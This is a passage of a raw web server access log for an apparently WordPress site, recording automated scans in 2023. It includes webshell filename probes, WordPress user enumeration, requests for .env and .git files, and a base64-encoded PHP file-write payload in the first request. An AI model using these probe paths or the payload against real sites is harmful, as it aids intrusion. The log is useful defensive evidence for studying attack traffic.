/wp-admin/css/colors/blue/blue.php?wall=ZWNobyAnQmxhY2sgQm90Jztmd3JpdGUoZm9wZW4oJ2Jsa3RnemRzLnBocCcsJ3crJyksJzw/cGhwIGVjaG8gIkJsYWNrIEJvdCI7Pz4nKTs= HTTP/1.1" 301 162 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 45.81.39.201 - - [06/Sep/2023:18:38:15 +0700] "GET /simple.php HTTP/1.1" 301 162 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 45.81.39.201 - - [06/Sep/2023:18:38:20 +0700] "GET /class.api.php HTTP/1.1" 301 162 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 45.81.39.201 - - [06/Sep/2023:18:38:34 +0700] "GET /wp-content/plugins/core-plugin/include.php HTTP/1.1" 301 162 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 45.81.39.201 - - [06/Sep/2023:18:38:41 +0700] "GET /403.php HTTP/1.1" 301 162 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 45.81.39.201 - - [06/Sep/2023:18:38:50 +0700] "GET /wp-head.php HTTP/1.1" 301 162 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 3.93.165.238 - - [06/Sep/2023:21:01:28 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; en-US) AppleWebKit/534.1 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/534.1" 45.81.39.201 - - [08/Sep/2023:02:34:01 +0700] "GET /wp-content/plugins/press/wp-class.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 205.210.31.105 - - [13/Sep/2023:10:25:37 +0700] "GET / HTTP/1.1" 301 162 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com" 45.81.39.201 - - [14/Sep/2023:13:56:00 +0700] "GET /wp-admin/dropdown.php HTTP/1.1" 301 162 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 45.81.39.201 - - [14/Sep/2023:13:56:15 +0700] "GET /wp-content/themes/sketch/404.php HTTP/1.1" 301 162 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 45.81.39.201 - - [14/Sep/2023:13:56:27 +0700] "GET /admin.php HTTP/1.1" 301 162 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 45.81.39.201 - - [14/Sep/2023:13:56:41 +0700] "GET /wp-content/plugins/revslider/includes/external/page/index.php HTTP/1.1" 301 162 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 45.81.39.201 - - [14/Sep/2023:13:56:55 +0700] "GET /wp-admin/network/themes.php HTTP/1.1" 301 162 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 45.81.39.201 - - [14/Sep/2023:13:57:15 +0700] "GET /wp-admin/maint/index.php HTTP/1.1" 301 162 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 45.81.39.201 - - [14/Sep/2023:13:57:29 +0700] "GET /alfanew.php HTTP/1.1" 301 162 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 45.81.39.201 - - [14/Sep/2023:13:57:44 +0700] "GET /alfanew.php7 HTTP/1.1" 301 162 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 45.81.39.201 - - [14/Sep/2023:13:57:53 +0700] "GET /wp-content/themes/hello-element/footer.php HTTP/1.1" 301 162 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 45.81.39.201 - - [14/Sep/2023:13:58:05 +0700] "GET /repeater.php HTTP/1.1" 301 162 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 45.81.39.201 - - [14/Sep/2023:13:58:23 +0700] "GET /wp-includes/IXR/class-IXR-date-ajax-response.php HTTP/1.1" 301 162 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 45.81.39.201 - - [14/Sep/2023:13:58:38 +0700] "GET /alfa-rex.php7 HTTP/1.1" 301 162 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 45.81.39.201 - - [14/Sep/2023:13:58:53 +0700] "GET /wp-includes/sodium_compat/network.php HTTP/1.1" 301 162 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 45.81.39.201 - - [14/Sep/2023:13:59:15 +0700] "GET /.well-known/pki-validation/index.php HTTP/1.1" 301 162 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 45.81.39.201 - - [14/Sep/2023:13:59:28 +0700] "GET /.well-known/pki-validation/moon.php HTTP/1.1" 301 162 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 45.81.39.201 - - [14/Sep/2023:13:59:39 +0700] "GET /wp-admin/includes/moon.php HTTP/1.1" 301 162 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 45.81.39.201 - - [14/Sep/2023:13:59:53 +0700] "GET /wp-content/themes/seotheme/mar.php HTTP/1.1" 301 162 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 45.81.39.201 - - [14/Sep/2023:14:00:06 +0700] "GET /wp-content/plugins/hellopress/wp_mna.php HTTP/1.1" 301 162 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 45.81.39.201 - - [14/Sep/2023:14:00:23 +0700] "GET /1index.php HTTP/1.1" 301 162 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 45.81.39.201 - - [14/Sep/2023:14:00:40 +0700] "GET /.well-known/pki-validation/admin.php HTTP/1.1" 301 162 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 45.81.39.201 - - [14/Sep/2023:14:00:53 +0700] "GET /wp-admin/includes/admin.php HTTP/1.1" 301 162 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 45.81.39.201 - - [14/Sep/2023:14:01:07 +0700] "GET /wp-admin/user/admin.php HTTP/1.1" 301 162 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 45.81.39.201 - - [14/Sep/2023:14:01:23 +0700] "GET /wp-content/plugins/press/wp-class.php HTTP/1.1" 301 162 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 45.81.39.201 - - [14/Sep/2023:14:01:50 +0700] "GET /wp-admin/css/colors/coffee/index.php HTTP/1.1" 301 162 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 78.135.77.132 - - [15/Sep/2023:09:39:33 +0700] "GET /wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 78.135.77.132 - - [15/Sep/2023:09:39:37 +0700] "GET ///?author=1 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 78.135.77.132 - - [15/Sep/2023:09:39:40 +0700] "GET ///wp-json/wp/v2/users/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 138.197.161.188 - - [15/Sep/2023:18:05:49 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 198.235.24.30 - - [16/Sep/2023:02:20:26 +0700] "GET / HTTP/1.1" 301 162 "-" "-" 185.145.245.42 - - [16/Sep/2023:02:53:20 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.87 Safari/537.36" 198.235.24.149 - - [17/Sep/2023:00:31:51 +0700] "GET / HTTP/1.1" 301 162 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com" 45.81.39.201 - - [17/Sep/2023:07:59:23 +0700] "GET /wp-admin/network/upfile.php HTTP/1.1" 301 162 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 35.214.161.13 - - [17/Sep/2023:16:49:33 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko; compatible; BW/1.1; bit.ly/3eZNDnO; 2fc3a14cf8) Chrome/84.0.4147.105 Safari/537.36" 35.214.161.13 - - [17/Sep/2023:16:49:44 +0700] "GET /robots.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko; compatible; BW/1.1; bit.ly/3eZNDnO; 2fc3a14cf8) Chrome/84.0.4147.105 Safari/537.36" 35.214.161.13 - - [17/Sep/2023:16:50:32 +0700] "GET /ads.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko; compatible; BW/1.1; bit.ly/3eZNDnO; 2fc3a14cf8) Chrome/84.0.4147.105 Safari/537.36" 35.214.161.13 - - [17/Sep/2023:16:50:32 +0700] "GET /app-ads.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko; compatible; BW/1.1; bit.ly/3eZNDnO; 2fc3a14cf8) Chrome/84.0.4147.105 Safari/537.36" 35.214.161.13 - - [17/Sep/2023:16:50:35 +0700] "GET /checkout/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko; compatible; BW/1.1; bit.ly/3eZNDnO; 2fc3a14cf8) Chrome/84.0.4147.105 Safari/537.36" 35.214.161.13 - - [17/Sep/2023:16:50:35 +0700] "GET /wp-content/plugins/woocommerce/readme.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko; compatible; BW/1.1; bit.ly/3eZNDnO; 2fc3a14cf8) Chrome/84.0.4147.105 Safari/537.36" 35.214.161.13 - - [17/Sep/2023:16:50:35 +0700] "GET /shop/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko; compatible; BW/1.1; bit.ly/3eZNDnO; 2fc3a14cf8) Chrome/84.0.4147.105 Safari/537.36" 45.81.39.201 - - [18/Sep/2023:04:39:15 +0700] "GET /wp-content/style-css.php HTTP/1.1" 301 162 "www.google.com" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 45.81.39.201 - - [18/Sep/2023:04:39:40 +0700] "GET /simple.php HTTP/1.1" 301 162 "www.google.com" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 45.81.39.201 - - [22/Sep/2023:00:06:25 +0700] "GET /wp-content/plugins/WordPressCore/include.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 34.217.49.227 - - [24/Sep/2023:10:42:29 +0700] "GET /.well-known/acme-challenge/zFBc_fENzBIyCbcLkpLTg0qnuUpXT06P6N-WpKFGZSU HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" 23.178.112.106 - - [24/Sep/2023:10:42:29 +0700] "GET /.well-known/acme-challenge/zFBc_fENzBIyCbcLkpLTg0qnuUpXT06P6N-WpKFGZSU HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" 3.145.176.126 - - [24/Sep/2023:10:42:29 +0700] "GET /.well-known/acme-challenge/zFBc_fENzBIyCbcLkpLTg0qnuUpXT06P6N-WpKFGZSU HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" 45.55.193.222 - - [24/Sep/2023:10:44:09 +0700] "GET / HTTP/1.1" 301 162 "-" "-" 45.55.193.222 - - [24/Sep/2023:10:44:10 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 6.0; HTC One M9 Build/MRA084446) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.1738.98 Mobile Safari/537.3" 45.55.193.222 - - [24/Sep/2023:10:44:10 +0700] "GET /.vscode/sftp.json HTTP/1.1" 301 162 "-" "Go-http-client/1.1" 45.55.193.222 - - [24/Sep/2023:10:44:10 +0700] "GET /about HTTP/1.1" 301 162 "-" "Go-http-client/1.1" 45.55.193.222 - - [24/Sep/2023:10:44:11 +0700] "GET /debug/default/view?panel=config HTTP/1.1" 301 162 "-" "Go-http-client/1.1" 45.55.193.222 - - [24/Sep/2023:10:44:11 +0700] "GET /v2/_catalog HTTP/1.1" 301 162 "-" "Go-http-client/1.1" 45.55.193.222 - - [24/Sep/2023:10:44:12 +0700] "GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application HTTP/1.1" 301 162 "-" "Go-http-client/1.1" 45.55.193.222 - - [24/Sep/2023:10:44:12 +0700] "GET /server-status HTTP/1.1" 301 162 "-" "Go-http-client/1.1" 45.55.193.222 - - [24/Sep/2023:10:44:13 +0700] "GET /login.action HTTP/1.1" 301 162 "-" "Go-http-client/1.1" 45.55.193.222 - - [24/Sep/2023:10:44:13 +0700] "GET /_all_dbs HTTP/1.1" 301 162 "-" "Mozilla/5.0 (l9scan/2.0.434323e223e2335313e2330313; +https://leakix.net)" 45.55.193.222 - - [24/Sep/2023:10:44:14 +0700] "GET /.DS_Store HTTP/1.1" 301 162 "-" "Go-http-client/1.1" 45.55.193.222 - - [24/Sep/2023:10:44:14 +0700] "GET /.env HTTP/1.1" 301 162 "-" "Go-http-client/1.1" 45.55.193.222 - - [24/Sep/2023:10:44:15 +0700] "GET /.git/config HTTP/1.1" 301 162 "-" "Go-http-client/1.1" 45.55.193.222 - - [24/Sep/2023:10:44:15 +0700] "GET /s/434323e223e2335313e2330313/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties HTTP/1.1" 301 162 "-" "Go-http-client/1.1" 45.55.193.222 - - [24/Sep/2023:10:44:16 +0700] "GET /config.json HTTP/1.1" 301 162 "-" "Go-http-client/1.1" 45.55.193.222 - - [24/Sep/2023:10:44:16 +0700] "GET /telescope/requests HTTP/1.1" 301 162 "-" "Go-http-client/1.1" 45.55.193.222 - - [24/Sep/2023:10:44:17 +0700] "GET /?rest_route=/wp/v2/users/ HTTP/1.1" 301 162 "-" "Go-http-client/1.1" 216.131.88.4 - - [24/Sep/2023:11:00:13 +0700] "GET / HTTP/1.1" 301 162 "http://wp.lautnusantara.com/" "Liferea/1.14.1 (Android 12; Mobile; https://lzone.de/liferea/) AppleWebKit (KHTML, like Gecko)" 45.88.97.15 - - [24/Sep/2023:11:00:13 +0700] "GET / HTTP/1.1" 301 162 "http://wp.lautnusantara.com/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.165 Safari/537.36" 216.151.180.4 - - [24/Sep/2023:11:00:13 +0700] "GET / HTTP/1.1" 301 162 "http://wp.lautnusantara.com/" "Mozilla/5.0 (Android 13; Mobile; rv:109.0) Gecko/112.0 Firefox/112.0" 202.74.239.11 - - [24/Sep/2023:11:00:14 +0700] "GET / HTTP/1.1" 301 162 "http://wp.lautnusantara.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 12_5_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.4 Safari/605.1.15" 216.131.88.4 - - [24/Sep/2023:11:00:51 +0700] "OPTIONS / HTTP/1.1" 301 162 "http://wp.lautnusantara.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36 Edg/113.0.1774.42" 202.74.239.11 - - [24/Sep/2023:11:00:52 +0700] "GET / HTTP/1.1" 301 162 "http://wp.lautnusantara.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 16_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/113.0.5672.69 Mobile/15E148 Safari/604.1" 65.154.226.170 - - [24/Sep/2023:11:02:46 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/116.0.5845.187 Safari/537.36" 205.169.39.87 - - [25/Sep/2023:04:46:02 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36" 205.169.39.87 - - [25/Sep/2023:04:46:18 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36" 3.34.202.190 - - [25/Sep/2023:10:37:33 +0700] "GET //wp.lautnusantara.com/wp-content/themes/matina-news/assets/library/lightslider/js/lightslider.min.js HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0" 3.34.202.190 - - [25/Sep/2023:10:37:33 +0700] "GET //wp.lautnusantara.com/wp-content/plugins/contact-form-7/includes/swv/js/index.js HTTP/1.1" 301 162 "-" "DoCoMo/2.0 N905i(c100;TB;W24H16) (compatible; Googlebot-Mobile/2.1; http://www.google.com/bot.html)" 67.207.94.29 - - [26/Sep/2023:02:33:41 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 54.216.208.193 - - [26/Sep/2023:17:15:55 +0700] "GET /robots.txt HTTP/1.1" 301 162 "-" "webprosbot/2.0 (+mailto:abuse-6337@webpros.com)" 54.216.208.193 - - [26/Sep/2023:17:15:56 +0700] "GET / HTTP/1.1" 301 162 "-" "webprosbot/2.0 (+mailto:abuse-6337@webpros.com)" 45.81.39.201 - - [26/Sep/2023:19:13:36 +0700] "GET /wp-includes/images/include.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 87.236.176.59 - - [27/Sep/2023:04:49:10 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)" 62.28.184.124 - - [28/Sep/2023:12:29:43 +0700] "GET /wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 62.28.184.124 - - [28/Sep/2023:12:29:48 +0700] "GET ///?author=1 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 62.28.184.124 - - [28/Sep/2023:12:30:07 +0700] "GET ///wp-json/wp/v2/users/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 159.65.116.216 - - [29/Sep/2023:11:30:34 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 52.16.231.196 - - [29/Sep/2023:16:58:02 +0700] "GET /robots.txt HTTP/1.1" 301 162 "-" "webprosbot/2.0 (+mailto:abuse-6337@webpros.com)" 52.16.231.196 - - [29/Sep/2023:16:58:03 +0700] "GET / HTTP/1.1" 301 162 "-" "webprosbot/2.0 (+mailto:abuse-6337@webpros.com)" 137.184.190.59 - - [02/Oct/2023:02:34:12 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 54.229.234.94 - - [02/Oct/2023:03:08:51 +0700] "GET / HTTP/1.0" 301 162 "-" "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)" 5.134.121.47 - - [03/Oct/2023:04:57:17 +0700] "GET /wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 5.134.121.47 - - [03/Oct/2023:04:57:22 +0700] "GET ///?author=1 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 5.134.121.47 - - [03/Oct/2023:04:57:26 +0700] "GET ///wp-json/wp/v2/users/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 45.81.39.201 - - [04/Oct/2023:01:33:15 +0700] "GET /wp-includes/widgets/include.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 45.81.39.201 - - [04/Oct/2023:16:31:57 +0700] "GET /wp-content/themes/include.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 45.81.39.201 - - [04/Oct/2023:16:32:35 +0700] "GET /wp-content/plugins/include.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 167.248.133.36 - - [04/Oct/2023:18:55:15 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" 198.235.24.222 - - [07/Oct/2023:19:33:18 +0700] "GET / HTTP/1.1" 301 162 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com" 31.186.172.143 - - [08/Oct/2023:23:52:10 +0700] "GET /wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 31.186.172.143 - - [08/Oct/2023:23:52:15 +0700] "GET ///?author=1 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 31.186.172.143 - - [08/Oct/2023:23:52:18 +0700] "GET ///wp-json/wp/v2/users/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 18.188.25.247 - - [09/Oct/2023:19:06:49 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (iPhone; U; CPU iPhone OS) (compatible; Googlebot-Mobile/2.1; http://www.google.com/bot.html)" 18.188.25.247 - - [09/Oct/2023:19:11:09 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36" 45.81.39.201 - - [10/Oct/2023:02:56:43 +0700] "GET /wp-content/themes/sketch/404.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 205.210.31.21 - - [10/Oct/2023:10:31:33 +0700] "GET / HTTP/1.1" 301 162 "-" "-" 212.224.98.109 - - [10/Oct/2023:12:05:11 +0700] "GET /wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 212.224.98.109 - - [10/Oct/2023:12:05:16 +0700] "GET ///?author=1 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 212.224.98.109 - 